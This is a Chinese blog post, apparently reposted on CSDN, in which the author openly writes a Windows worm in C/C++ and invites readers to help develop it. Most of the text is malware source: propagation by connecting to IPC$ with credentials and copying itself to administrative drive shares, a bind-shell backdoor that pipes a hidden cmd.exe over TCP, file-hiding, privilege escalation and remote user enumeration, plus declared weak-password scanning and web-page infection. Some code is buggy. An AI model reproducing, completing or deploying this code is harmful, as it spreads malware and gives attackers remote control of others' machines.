一起动手写蠕虫病毒(一)

最新推荐文章于 2022-07-31 16:21:13 发布
最新推荐文章于 2022-07-31 16:21:13 发布
阅读量1.9k 收藏 4
点赞数
分类专栏: C/C++ 病毒学习 Other code life 文章标签: object socket null dst path internet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/clin003/article/details/1605040
版权
Other 同时被 3 个专栏收录
286 篇文章 0 订阅
订阅专栏
code life
252 篇文章 0 订阅
订阅专栏
C/C++
44 篇文章 1 订阅
订阅专栏
作者:公子哥 來源:鷹緣社區 http://blog.sina.com.cn/u/4b3b2a1a0100080w


  by clin003 zhuan at 20070506 from:http://blog.csdn.net/clin003
申明:
所发代码均为测试代码,不保证代码的完整性。
其间或多有纰漏不足之处.待全部完成后我会整理调试好,
发布完整正确的代码。以下代码仅做为参考、阅读

今天终于下定决心要认认真真的写完一个病毒.我的目标是每天在这里写一点,让大家一起参与这个病毒的开发,在开发中不断的相互学习、成长,磨练技术..所谓集思广益,发挥群众的力量嘛-_-# ...有兴趣加入开发者可以联系我的QQ : 158465120 。

以下是今天写的一点代码,,可能比较凌乱,难以入目,还请大家谅解!

主文件:9527.cpp

#include< windows.h >
#include< winnetwk.h >
#include< tchar.h >
#include
#include< stdio.h >
#pragma comment(lib,"mpr.lib")
#include "9527.h"



char * StringConnect(__w64 unsigned int nSize , char * src, ...)
{
va_list arg_ptr;
char * dst =(char *)malloc(nSize);
va_start(arg_ptr,src);
__w64 unsigned int inc = 0;
do {
for (;*src;++src) *(dst+inc++) = *src;
src = va_arg(arg_ptr,char*);
} while(src);
*(dst+inc) = '/0';
return ( dst );
}
BOOL IPCConnect(PIPCCONNECT pServer)
{
NETRESOURCE ns;
TCHAR buf[MAX_PATH];
wsprintf(buf," %s//ipc$",pServer->phost);
ZeroMemory(&ns,sizeof(ns));
ns.dwScope=RESOURCE_GLOBALNET;
ns.dwType=RESOURCETYPE_ANY;
ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;
ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;
ns.lpLocalName="";
ns.lpRemoteName=buf;
ns.lpProvider=NULL;
ns.lpComment=NULL;
char * hhost = pServer->phost;
BOOL IpcConnect;
IpcConnect =WNetAddConnection2(&ns,pServer->ppass,pServer->pusr,0);
if(IpcConnect)
{
for (int i = ASCII_START ; i < ASCII_END ; i++)
{
char driveName[3]={(char)i,'$'};
//复制自身到可写共享
IpcConnect=CopyFile(pServer->pfile,
StringConnect(1024," ",pServer->phost,"//",driveName,"//",pServer->pfile),FALSE);
if(!IpcConnect)
{
/*文件复制失败!*/
}
else
{
/*成功则远程启动 */
return TRUE ;
}
}
return FALSE ;
}
else
{
/*连接失败*/
return FALSE ;
}
}
void main()
{}

9527.h

#include "structmain.h"
#define ASCII_START 65
#define ASCII_END 91
/* 连接字符串 */
char * StringObjectConnect(PSTRING_OBJECT_CONNECT ) ;
/* 根据索引ID返回链表中的元素 */
char * StringObjectSearchID(PSTRING_OBJECT_CONNECT , int );
/* 根据索引ID修改内存中数据 */
char * StringObjectSetID(PSTRING_OBJECT_CONNECT ,int ,char * );
/* IPC$连接 */
BOOL IPCConnect() ;
/* 获取Server时间 */
int GetServerDateTime(PTSTR server);
char * StringConnect(__w64 unsigned int , char * , ...) ;


structmain.h

#include "StringObject.h"
/* IPC$连接数据结构 */
typedef struct _IPCCONNECT
{
char * phost ;
char * pusr ;
char * ppass;
char * pfile ;
}IPCCONNECT,*PIPCCONNECT ;


StringObject.h

typedef char* elemtype ;
/* String 数据结构
需要对连接的字符串进行修改、叠加等..可用此链表结构
*/
typedef struct _STRING_OBJECT_CONNECT
{
elemtype data ;
_STRING_OBJECT_CONNECT * next ;
} STRING_OBJECT_CONNECT ,*PSTRING_OBJECT_CONNECT ;




PS:今天只写病毒通过IPC$传播部分.欲知下回,请耐心等待..-_-#
 
中午吃完饭,打了会CS,打成负数,输的太惨,NND手气太差了..
退出来花了点时间写了点代码,下面的各个函数会在以后的病毒编写中用到。。
有些函数的功能有类似的API可以完成,但是我的原则是能自己写出来就尽量不用API 。。

主文件新增函数:

char * GetTag(char * src , char tag)
{
while(*src)src++;
while(src--&&*src != tag);
return src ;
}
char * GetFilePath(char * src)
{
char * path = src;
int nSrc = 0 , nDst= 0;
while(*(path++)&&++nSrc);
while(*path!=92&&path--&&++nDst);
path = src;
path+= nSrc - nDst;
*path='/0';
return ( src ) ;
}
char * GetOsPath(char pOspath[])
{
GetWindowsDirectory(pOspath,_MAX_PATH);
return strcat(pOspath," //system32//");
}
int NetWorkTypes(int nFlag)
{
DWORD flags;
BOOL m_bOnline;
m_bOnline=InternetGetConnectedState(&flags,0);
if(m_bOnline)
{
if(flags & INTERNET_CONNECTION_MODEM)
return nFlag = 0;
if(flags & INTERNET_CONNECTION_LAN)
return nFlag = 1;
if(flags & INTERNET_CONNECTION_PROXY)
return nFlag = 2;
if(flags & INTERNET_CONNECTION_MODEM_BUSY)
return nFlag = 3;
}
return -1;
}
BOOL FileExists(LPCTSTR lpszFileName)
{
DWORD dwAttributes = GetFileAttributes(lpszFileName);
if (dwAttributes == 0xFFFFFFFF)
return FALSE;
if ((dwAttributes & FILE_ATTRIBUTE_DIRECTORY)
== FILE_ATTRIBUTE_DIRECTORY)
{
return FALSE;
}
else{
return TRUE;
}
}
//加入链表(字符串连接)
PSTRING_OBJECT_CONNECT StringObjectBuilder(PSTRING_OBJECT_CONNECT p ,
PSTRING_OBJECT_CONNECT q ,
__w64 unsigned int nSize ,
char * src, ...)
{
va_list arg_ptr;
char * dst =(char *)malloc(nSize);
va_start(arg_ptr,src);
__w64 unsigned int inc = 0;
do {
for (;*src;++src) *(dst+inc++) = *src;
src = va_arg(arg_ptr,char*);
} while(src);
*(dst+inc) = '/0';
p = (PSTRING_OBJECT_CONNECT)malloc(sizeof (PSTRING_OBJECT_CONNECT)) ;
p->data = dst ;
p->next = NULL;
q->next=p; /* 加入链表 */
q=q->next ; /* 指向下一个地址,实际上也是NULL,即p->next */
return q ;
}
//连接内存中各地址中的字符串(遍历链表数据)
char * StringObjectConnect(PSTRING_OBJECT_CONNECT head)
{
PSTRING_OBJECT_CONNECT p ;
p = head->next;
__w64 unsigned int nSize = 0;
while(p) {
nSize+=strlen(p->data);
p=p->next ;
}
char * dst = (char *)malloc(nSize);
p = head->next;
int n = 0;
while(p){
for (;*p->data;p->data++,n++) dst[n] = *p->data;
p=p->next ;
}
dst[n] = '/0';
return (dst);
}
//根据索引ID返回元素
char * StringObjectSearchID(PSTRING_OBJECT_CONNECT head, int nIndex)
{
PSTRING_OBJECT_CONNECT p ;
p = head->next;
int i = 0;
nIndex-=1 ;
while(p&&i
{
p=p->next;
i++;
}
if(!p&&i>nIndex)
return '/0';
else
return p->data ;
}
//根据索引ID修改内存中数据
char * StringObjectSetID(PSTRING_OBJECT_CONNECT head,int nIndex ,char * src)
{
PSTRING_OBJECT_CONNECT p ;
p = head->next;
int i = 0;
nIndex-=1 ;
while(p&&i
{
p=p->next;
i++;
}
if(!p&&i>nIndex)
return '/0';
char * cp = p->data;
while( *cp++ = *src++ );
return( p->data );
}

函数申明:
9527.h

/* 获取标志信息,本程序中主要用来获取扩展名 */
char * GetTag(char * , char ) ;
/* 根据文件绝对路径取得文件所在目录 */
char * GetFilePath(char * );
/* 取得系统路径 */
char * GetOsPath(char []);
/* 取得当前机器上网类型 */
int NetWorkTypes(int );
/* 检查文件是否存在 */
BOOL FileExists(LPCTSTR ) ;

ps:晚上回去写内网扫描部分,争取晚上能发点代码上来-_-#
 
(待續)
by clin003 zhuan at 20070506 from:http://blog.csdn.net/clin003
---------------------------
贴零晨写的代码-_-#

主文件新增头文件:

#pragma comment(lib,"sfc.lib" )
#pragma comment(lib,"WS2_32")
#pragma comment(lib,"Iphlpapi.lib")
#pragma comment(lib,"netapi32")

新增函数:

void OpenCmdShell()
{
WSADATA wsaData;
SOCKET m_socket,AcceptClient;
sockaddr_in Service,Client;
int ClientSize,i=0;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
return;
m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if(m_socket==SOCKET_ERROR)
return;
Service.sin_family = AF_INET;
Service.sin_addr.s_addr = htonl(INADDR_ANY);
Service.sin_port = htons( PORT );
if(bind( m_socket, (SOCKADDR*)&Service, sizeof(Service) )==SOCKET_ERROR)
return;
if (listen(m_socket,5)==SOCKET_ERROR)
return;
ClientSize=sizeof(Client);
while(1)
{
AcceptClient=accept(m_socket,(SOCKADDR*)&Client,&ClientSize);
if(AcceptClient==SOCKET_ERROR)
return;
printf( "Client Connected./n");
char *sendbuf = "/***************************************///n9527 By:M80 /n";
send( AcceptClient, sendbuf, strlen(sendbuf), 0 );
if(CreateThread(NULL,0,ClientThread,(LPVOID)&AcceptClient,0,NULL)==NULL)
printf("Create Thread Error!/n");
Sleep(1000);
}
WSACleanup();
closesocket(AcceptClient);
return;
}

DWORD WINAPI ClientThread(LPVOID lpParam)
{
int ret;
char Buf[1024];
HANDLE Rpipe,Wpipe,Wfile,Rfile;
SOCKET AcceptClient=(SOCKET)*(SOCKET*)lpParam;
SECURITY_ATTRIBUTES sa;
sa.nLength=sizeof(sa);
sa.bInheritHandle=TRUE;
sa.lpSecurityDescriptor=NULL;
ret=CreatePipe(&Rpipe,&Rfile,&sa,0);
ret=CreatePipe(&Wfile,&Wpipe,&sa,0); //建立两个管道,分别用于接收命令和显示结果
STARTUPINFO startinfo;
GetStartupInfo(&startinfo);
startinfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startinfo.hStdInput=Wfile;
startinfo.hStdError=startinfo.hStdOutput=Rfile;
startinfo.wShowWindow=SW_HIDE;
char cmdline[MAX_PATH];
GetSystemDirectory(cmdline,MAX_PATH);
strcat(cmdline,(" //cmd.exe"));
PROCESS_INFORMATION proinfo;
ret=CreateProcess(cmdline,NULL,NULL,NULL,1,0,NULL,NULL,&startinfo,&proinfo);
unsigned long ByteRec;
while(1)
{
Sleep(100);
PeekNamedPipe(Rpipe,Buf,1024,&ByteRec,0,0);
if(ByteRec)
{
ret=ReadFile(Rpipe,Buf,ByteRec,&ByteRec,0);
if(!ret)
break;
//memset(Buf, 0, sizeof(Buf)); //清空缓冲区
ret=send(AcceptClient,Buf,ByteRec,0);
if(ret<=0)
break;
}
else
{
ByteRec=recv(AcceptClient,Buf,1024,0);
if(ByteRec<=0)
break;
ret=WriteFile(Wpipe,Buf,ByteRec,&ByteRec,0);
if(!ret)
break;
}
}
return 0;
}
BOOL IsProtectedFile(char * pFile)
{
unsigned short wszFileName[MAX_PATH];
MultiByteToWideChar(CP_ACP, 0, pFile, -1, wszFileName, MAX_PATH);
return SfcIsFileProtected(NULL, wszFileName);
}
BOOL OperationFile(char * pFile)
{
return SetFileAttributes(pFile ,FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );
}
BOOL EnablePrivilege(LPCTSTR lpSystemName,LPCTSTR lpName)
{
HANDLE hToken;
BOOL fOk=FALSE;
if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount=1;
if(!LookupPrivilegeValue(lpSystemName,lpName,&tp.Privileges[0].Luid))
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL))
fOk=(GetLastError()==ERROR_SUCCESS);
CloseHandle(hToken);
}
return fOk;
}
int UsersList(LPCWSTR server)
{
PNET_DISPLAY_USER pBuf,pBuffer;
DWORD nStatus;
DWORD dwRec;
DWORD i=0;
DWORD dwLevel;
dwLevel=1;
do
{
nStatus=NetQueryDisplayInformation
(server,dwLevel,i,100,0xFFFFFFFF,&dwRec,(PVOID *)&pBuf);
if((nStatus==ERROR_SUCCESS) || (nStatus==ERROR_MORE_DATA))
{
pBuffer=pBuf;
for(;dwRec>0;dwRec--)
{
i=pBuffer->usri1_next_index;
pBuffer++;
/* 待实现 */
}
}
else
{
/* 待实现 */
}
if(pBuf!=NULL)
{
NetApiBufferFree(pBuf);
}
}
while(nStatus==ERROR_MORE_DATA);
return 0;
}

9527.h

/* 检查是否系统文件 */
BOOL IsProtectedFile(char * );
/* 设置文件属性 */
BOOL OperationFile(char * );
/* 客户端线程 */
DWORD WINAPI ClientThread(LPVOID );
/* 开启CMDSHELL后门 */
void OpenCmdShell();
/* 探测远程主机用户列表 */
int UsersList(LPCWSTR ) ;
/* 权限提升 */
BOOL EnablePrivilege(LPCTSTR ,LPCTSTR );
/* NT系统弱口令扫描 */
BOOL ScanServer(char * server);
/* 感染网页文件 */
BOOL SetWeb(char *);
 
clin003
关注
专栏目录
[系统安全] 十四.熊猫烧香病毒IDA和OD逆向分析--病毒释放过程(下)
杨秀璋的专栏
01-08 5150
如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您喜欢!
[系统安全] 十三.熊猫烧香病毒IDA和OD逆向分析(中)病毒释放机理
杨秀璋的专栏
01-07 5320
如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您喜欢! IDA和OD作为逆向分析的“倚天剑和“屠龙刀”,学好它们的基本用法至关重要。本文重点分析熊猫烧香病毒的功
java编蠕虫病毒_教大家编蠕虫病毒
weixin_34318945的博客
02-28 1517
教大家编蠕虫病毒(2009-04-13 14:16:08)标签:杂谈自从进入07年以来 偶一直点背的透不过气! 很郁闷~ 死的心都有!!不知道应该做些什么/怎么做才是对的! 很彷徨````````不说了进入正题~Hello,My Name Is Unhacker QQ:80018141 (c) 2007 WoRmI don't take responsibility for any damage...
网络安全下用c语言蠕虫病毒,神经网络在计算机网络安全管理中的应用
weixin_28965963的博客
05-25 393
摘 要:伴随着改革开放的不断深入和发展,新的世纪,全球进入信息时代,计算机网络平台在人们日常生活中扮演的角色越来越重要,计算机网络能够储存大量的信息资源,不仅给人们的生活带来了极大的便利,而且丰富了人们的生活。信息时代,各种各样的信息通过计算机终端实现共享和传递,面对重要的信息数据,就应该对计算机网络的安全管理引起高度重视。近年来,信息科技的高速发展,使得计算机系统的漏洞发现速度比过去快了许多,大...
蠕虫病毒技术
大浪淘沙的专栏
07-07 2928
 蠕虫病毒技术收藏 function StorePage(){d=document;t=d.selection?(d.selection.type!=None?d.selection.createRange().text:):(d.getSelection?d.getSelection():);void(keyit=window.open(http://www.365
浅谈用delphi来编蠕虫病毒
hackxz's Blog
01-25 1364
浅谈用delphi来编蠕虫病毒 前言: 可能大家想到病毒,第一反应就是可能是用asm来编,或者是vbsript,而高级语言如delphi就好象不能编一样,其实事实并不是这个样子的,只
python蠕虫病毒_XP时代的incaseformat蠕虫病毒大规模爆发
weixin_42144086的博客
03-02 1655
1月13日,360安全卫士收到大量用户反馈,电脑中除C盘之外的其他磁盘文件都被删除,且磁盘中可能被创建”启动后约20s就开始自动删除文件,简单暴力。上古世纪的incaseformat作者代码错,导致10年前的病毒潜伏到现在。此次的病毒与常见的蠕虫病毒不同,不仅伪造了文件夹图标、隐藏原始文件夹,还设置了定时删除文件的逻辑。分析发现,该病毒每隔20秒检测一次时间,当年大于2009年,月大于3月,日期...
【安全攻防系列】教你如何 ssh暴力破解、捕捉短连接、清理挖矿病毒、盖茨木马和DDOS病毒
weixin_54707168的博客
02-22 656
【安全攻防系列】教你如何 ssh暴力破解、捕捉短连接、清理挖矿病毒、盖茨木马和DDOS病毒
深层病毒防护指南
网络 人生 学习 进步
08-08 9486
引言  虽然许多组织已经开发了防病毒软件,但恶意软件(例如,计算机病毒、蠕虫和特洛伊木马)仍在继续感染着世界各地的计算机系统。关于这个显而易见的矛盾产生的根源,不是几句话就可以解释清楚的;但目前情况却表明,在环境中的每台计算机上部署防病毒软件的标准方法可能不足以应对恶意软件。《深层病毒防护指南》针对不同类型的恶意软件提供了简明易懂的概述,包括与恶意软件所带来的风险、恶意软件特征
【网络安全】应用实践题(无答案)
计算机小白努力学习
08-09 1551
第1章 网络安全概述 (1) 安装、配置构建虚拟局域网(上机完成): 下载并安装一种虚拟机软件,配置虚拟机并构建虚拟局域网。 (2) 下载并安装一种网络安全检测软件,对校园网安全检测并简要分析。 (3) 通过调研及参考资料,出一份有关网络安全威胁的具体分析资料。 (4) 通过调研及借鉴资料,出一份分析网络安全问题的报告。 解释下列网络信息安全的要素: (5)举例说明保密性、完整性、可用性 保密性指网络中的数据必须按照数据的拥有者的要求保证一定的秘密性,不会被未 授权的第三方非法获知。具有敏感性的秘密信息
C++编U盘感染蠕虫病毒动画教程
12-26
用c++编U盘感染蠕虫病毒的动画视频教程,里面含有详细的讲解过程
python蠕虫病毒_防范“WannaCry蠕虫病毒”攻击,方法及补丁下载地址
weixin_39960319的博客
12-17 685
MS17-010:Windows SMB 服务器安全更新:2017 年 3 月 14 日,后面有提供5月更新,可以直接安装5月更新。早在三月份,微软就针对此次共计利用的安全漏洞发布了更新补丁,并推送给了所有开启自动更新的用户,支持系统包括Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server...
一些蠕虫的法。。
zhkza99c的专栏
10-07 7208
下面是最常见的感染U盘的代码,很好理解,网上的代码,没有改。void cfile(LPCTSTR drivers){HANDLE hCFN;char ch1[MAX_PATH];DWORD filesize1 , wsize;wsprintf(ch1,"%sautorun.inf",drivers);char autorunc[]="[AutoRun] /n open=Recycled//note
java编蠕虫病毒_网络蠕虫病毒代码分析
weixin_39751076的博客
02-28 5033
实验步骤1、学生单击实验拓扑按钮,进入实验场景,进入目标主机。2、学生输入账号admin ,密码123456,登录到实验场景中的目标主机。如图所示:3、 代码分析:Set objFs=CreateObject(“Scripting.FileSystemObject”)(创建一个文件系统对象)objFs.CreateTextFile ("C:\virus.txt", 1)(通过文件系统对象的方法创建...
C++蠕虫病毒免疫器 (antiAutoRun)
cjz2005的博客
07-17 603
使用方法: 输入 一 个 想要免疫的磁盘盘符,如C:\ D:\ E:\ 填完整! 回车 原理: 创建一个无法删除的文件夹(运用Windows文件系统的特性) (控制台版) 源码
python模拟类蠕虫--蠕虫初探
l805142479的博客
03-14 5395
使用python模拟蠕虫自我复制原理,初步实现自我复制、变异等功能
蠕虫病毒
steel的专栏
03-15 2241
  蠕虫病毒是一种常见的计算机病毒。它是利用网络进行复制和传播,传染途径是通过网络和电子邮件。最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。  蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它(蠕虫病毒)的某些部分到其他的计算机系统中(通常是经过网络连接)。请注意,与一般病毒不同,蠕虫不需要将其自身附着到
【Python脚本进阶】2.4、conficker蠕虫(终)
07-31 1362
【Python脚本进阶】conficker蠕虫
【Python脚本进阶】2.4、conficker蠕虫(下):暴破口令,远程执行进程
07-31 385
【Python脚本进阶】暴破口令,远程执行进程
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值